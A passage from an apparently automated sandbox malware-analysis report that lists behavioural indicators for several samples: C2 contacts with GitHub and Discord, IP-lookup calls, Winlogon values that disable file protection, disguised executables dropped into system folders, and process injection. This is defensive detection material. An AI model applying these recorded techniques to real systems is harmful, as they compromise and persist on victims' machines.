(read-only) \??\i: goqabvnnwp.exe File opened (read-only) \??\s: goqabvnnwp.exe File opened (read-only) \??\k: xwsrwnbm.exe File opened (read-only) \??\a: xwsrwnbm.exe File opened (read-only) \??\k: xwsrwnbm.exe File opened (read-only) \??\o: xwsrwnbm.exe File opened (read-only) \??\e: goqabvnnwp.exe File opened (read-only) \??\n: goqabvnnwp.exe File opened (read-only) \??\p: xwsrwnbm.exe File opened (read-only) \??\w: xwsrwnbm.exe File opened (read-only) \??\l: xwsrwnbm.exe File opened (read-only) \??\p: xwsrwnbm.exe File opened (read-only) \??\t: xwsrwnbm.exe File opened (read-only) \??\k: goqabvnnwp.exe File opened (read-only) \??\v: goqabvnnwp.exe File opened (read-only) \??\a: xwsrwnbm.exe File opened (read-only) \??\n: xwsrwnbm.exe File opened (read-only) \??\s: xwsrwnbm.exe File opened (read-only) \??\q: xwsrwnbm.exe File opened (read-only) \??\u: xwsrwnbm.exe File opened (read-only) \??\x: xwsrwnbm.exe File opened (read-only) \??\r: xwsrwnbm.exe File opened (read-only) \??\u: goqabvnnwp.exe File opened (read-only) \??\z: goqabvnnwp.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 153 raw.githubusercontent.com 154 raw.githubusercontent.com 166 discord.com 168 discord.com -
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 116 ip-api.com 259 api.2ip.ua 260 api.2ip.ua 287 api.ipify.org 335 api.2ip.ua -
Modifies WinLogon 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCScan = "0" goqabvnnwp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable = "4294967197" goqabvnnwp.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
AutoIT Executable 4 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000023429-121.dat autoit_exe behavioral2/files/0x000700000002342e-215.dat autoit_exe behavioral2/files/0x0007000000023423-205.dat autoit_exe behavioral2/files/0x0007000000023618-4646.dat autoit_exe -
Drops file in System32 directory 13 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\xwsrwnbm.exe jaffa.exe File created \??\c:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc.exe xwsrwnbm.exe File opened for modification \??\c:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc.exe xwsrwnbm.exe File opened for modification C:\Windows\SysWOW64\goqabvnnwp.exe jaffa.exe File opened for modification C:\Windows\SysWOW64\jzhwakyvvosbjmz.exe jaffa.exe File created C:\Windows\SysWOW64\xwsrwnbm.exe jaffa.exe File opened for modification \??\c:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc.exe xwsrwnbm.exe File created C:\Windows\SysWOW64\goqabvnnwp.exe jaffa.exe File created C:\Windows\SysWOW64\jzhwakyvvosbjmz.exe jaffa.exe File opened for modification C:\Windows\SysWOW64\msvbvm60.dll goqabvnnwp.exe File created \??\c:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc.exe xwsrwnbm.exe File created C:\Windows\SysWOW64\hmhxytmhryech.exe jaffa.exe File opened for modification C:\Windows\SysWOW64\hmhxytmhryech.exe jaffa.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 4032 tasklist.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\%username%\\Desktop\\t\\a\\bg.png" reg.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 6788 set thread context of 1256 6788 powershell.exe 226 PID 6468 set thread context of 1684 6468 selfaware.exe 433 PID 1364 set thread context of 4412 1364 sjhkhda.exe 434 PID 5100 set thread context of 3388 5100 selfaware.exe 467 PID 6888 set thread context of 1112 6888 build3.exe 473 PID 1792 set thread context of 2128 1792 mstsca.exe 479 -
Drops file in Program Files directory 28 IoCs
description ioc Process File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker_i386.dll WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-V7H74.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created \??\c:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.exe xwsrwnbm.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.exe xwsrwnbm.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.nal xwsrwnbm.exe File created \??\c:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC.exe xwsrwnbm.exe File created C:\Program Files\Winaero Tweaker\is-J5OMP.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-KUQMK.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\SubDir\Romilyaa.exe scary.exe File opened for modification \??\c:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.exe xwsrwnbm.exe File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker.exe WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-0DDCF.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-92INO.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC.exe xwsrwnbm.exe File created C:\Program Files\Winaero Tweaker\unins000.dat WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\WinaeroControls.dll WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker_x86_64.dll WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\Elevator.exe WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-IK0UE.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-98RP8.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-L925N.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\unins000.dat WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\SubDir\Romilyaa.exe scary.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.nal xwsrwnbm.exe File created C:\Program Files\Winaero Tweaker\is-TOKQC.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweakerHelper.exe WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-RMUN0.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification \??\c:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC.exe xwsrwnbm.exe -
Drops file in Windows directory 19 IoCs
description ioc Process File opened for modification \??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.746_none_ebc47b06544bfaab\MsoIrmProtector.doc.exe xwsrwnbm.exe File opened for modification \??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.746_none_f619255888acbca6\MsoIrmProtector.doc.exe xwsrwnbm.exe File created C:\Windows\~$mydoc.rtf WINWORD.EXE File opened for modification \??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_c3bc3dbd94da3c61\MsoIrmProtector.doc.exe xwsrwnbm.exe File created \??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_c3bc3dbd94da3c61\MsoIrmProtector.doc.exe xwsrwnbm.exe File created \??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.746_none_ebc47b06544bfaab\MsoIrmProtector.doc.exe xwsrwnbm.exe File opened for modification \??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.746_none_ebc47b06544bfaab\MsoIrmProtector.doc.exe xwsrwnbm.exe File created \??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_ce10e80fc93afe5c\MsoIrmProtector.doc.exe xwsrwnbm.exe File created \??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_ce10e80fc93afe5c\MsoIrmProtector.doc.exe xwsrwnbm.exe File created \??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.746_none_f619255888acbca6\MsoIrmProtector.doc.exe xwsrwnbm.exe File opened for modification C:\Windows\mydoc.rtf WINWORD.EXE File created \??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_c3bc3dbd94da3c61\MsoIrmProtector.doc.exe xwsrwnbm.exe File opened for modification \??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.746_none_f619255888acbca6\MsoIrmProtector.doc.exe xwsrwnbm.exe File created \??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.746_none_ebc47b06544bfaab\MsoIrmProtector.doc.exe xwsrwnbm.exe File opened for modification \??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_ce10e80fc93afe5c\MsoIrmProtector.doc.exe xwsrwnbm.exe File opened for modification \??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_ce10e80fc93afe5c\MsoIrmProtector.doc.exe xwsrwnbm.exe File created \??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.746_none_f619255888acbca6\MsoIrmProtector.doc.exe xwsrwnbm.exe File opened for modification C:\Windows\mydoc.rtf jaffa.exe File opened for modification \??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_c3bc3dbd94da3c61\MsoIrmProtector.doc.exe xwsrwnbm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Program crash 2 IoCs
pid pid_target Process procid_target 7156 6568 WerFault.exe 174 1304 1256 WerFault.exe 226 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jkka.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SolaraBootstrapper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language !FIXInj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language selfaware.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wimloader.dll Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mstsca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ac3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sjhkhda.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vir.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cipher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hmhxytmhryech.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mstsca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language notepad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cipher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ProgressBarSplash.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language freebobux.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3cb220f1aaa32ca310586e5f62dcab1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xwsrwnbm.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 21 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5772 PING.EXE 5244 PING.EXE 1500 PING.EXE 3260 PING.EXE 7056 PING.EXE 6860 PING.EXE 5232 PING.EXE 5512 PING.EXE 4912 PING.EXE 6256 PING.EXE 5352 PING.EXE 3988 PING.EXE 5984 PING.EXE 6656 cmd.exe 6432 PING.EXE 4124 PING.EXE 1388 PING.EXE 4412 PING.EXE 6080 PING.EXE 6524 PING.EXE 3448 PING.EXE -
NSIS installer 2 IoCs
resource yara_rule behavioral2/files/0x0007000000023448-240.dat nsis_installer_1 behavioral2/files/0x0007000000023448-240.dat nsis_installer_2 -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Delays execution with timeout.exe 4 IoCs
pid Process 6408 timeout.exe 4920 timeout.exe 4108 timeout.exe 5760 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 5508 wmic.exe -
Enumerates system info in registry 2 TTPs 29 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 1480 ipconfig.exe -
Kills process with taskkill 7 IoCs
pid Process 2764 taskkill.exe 4824 taskkill.exe 6548 taskkill.exe 6736 taskkill.exe 7128 taskkill.exe 6488 taskkill.exe 2216 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\11 reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\37 reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\7 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16\IEFixedFontName = "Vani" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\15\IEFixedFontName = "Vijaya" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\22\IEFixedFontName = "Sylfaen" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24\IEPropFontName = "MS PGothic" reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\27 reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\28 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\28\IEFixedFontName = "Gadugi" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\32\IEFixedFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10\IEPropFontName = "Kokila" reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\26 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\26\IEFixedFontName = "NSimsun" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\33\IEPropFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34\IEFixedFontName = "Iskoola Pota" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16\IEPropFontName = "Vani" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\4\IEFixedFontName = "Courier New" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\11\IEPropFontName = "Shonar Bangla" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\31\IEPropFontName = "Times New Roman" reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\4 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\22\IEPropFontName = "Sylfaen" reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\38 reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\14 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\20\IEPropFontName = "Leelawadee UI" reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\6\IEFixedFontName = "Courier New" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13\IEFixedFontName = "Shruti" reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\9 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\36\IEPropFontName = "Myanmar Text" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\23\IEPropFontName = "Gulim" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\35\IEPropFontName = "Estrangelo Edessa" reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\21 reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\5 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\8\IEPropFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24\IEFixedFontName = "MS Gothic" reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\19\IEFixedFontName = "Cordia New" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\21\IEPropFontName = "Microsoft Himalaya" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\25\IEFixedFontName = "MingLiu" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29\IEFixedFontName = "Gadugi" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet 